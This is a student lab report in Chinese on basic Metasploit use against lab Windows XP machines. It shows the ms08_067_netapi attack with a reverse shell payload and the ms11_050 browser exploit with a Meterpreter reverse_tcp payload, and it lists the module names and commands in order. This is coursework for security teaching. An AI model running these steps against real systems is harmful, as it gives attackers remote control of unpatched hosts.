标签：序列号   成功   分享   window   xpl   序列   查询   ref   中文   

20155305《网络对抗》MSF基础应用

实验过程

实验系统

• 靶机1：Windows XP Professional SP2 ，IP地址：192.168.1.108
• 靶机2：Windows XP Professional SP3 简体中文，IP地址：192.168.1.113
• windows XP的虚拟机安装可以在这个网址下载iso镜像，至于序列号就百度吧，会有很多。
• Kali IP地址：192.168.1.105

1、主动攻击：ms08_067

• 使用靶机1和Kali
  先msfconsole进入msf，再用search ms08_067查询一下针对该漏洞的攻击模块：

• 用use exploit/windows/smb/ms08_067_netapi使用该模块：

• 用show targets查看可以被攻击的靶机的操作系统型号：

• 用show payloads查看可以供我们使用的攻击载荷：

• 从中找到一个可用的攻击载荷generic/shell_reverse_tcp，用set payload generic/shell_reverse_tcp设置payload：

• 用show options查看需要设置的参数：

• 这里需要设置RHOST（靶机IP）和LHOST（Kali的IP），使用set 需设置的参数名 参数值命令即可设置：

• 设置target选项目标（例如我攻击系统为WIN xp 中文简体 SP2，所以选择10）

• 用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击：

• 攻击成功后会获取靶机的shell，可以对其进行操作：

2、针对浏览器的攻击：ms11_050

• 使用靶机2和Kali（一开始用自己的最后会有问题，所以换了老师之前的kali）

用search ms11_050查询一下针对该漏洞的攻击模块，并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块：

• 用info查看该模块的信息（这个指令相当于show targets、show options等的集合版）：

基本信息：

• targets信息：

• options信息：

• 用set payload windows/meterpreter/reverse_tcp设置payload，并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好：

• 确认参数设置无误后，用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

• 在靶机IE上输入该网址：

• kali中显示session 1已经创建，并显示其会话ID：

20155305《网络对抗》MSF基础应用

标签：序列号   成功   分享   window   xpl   序列   查询   ref   中文   

原文地址：https://www.cnblogs.com/20155305ql/p/8820504.html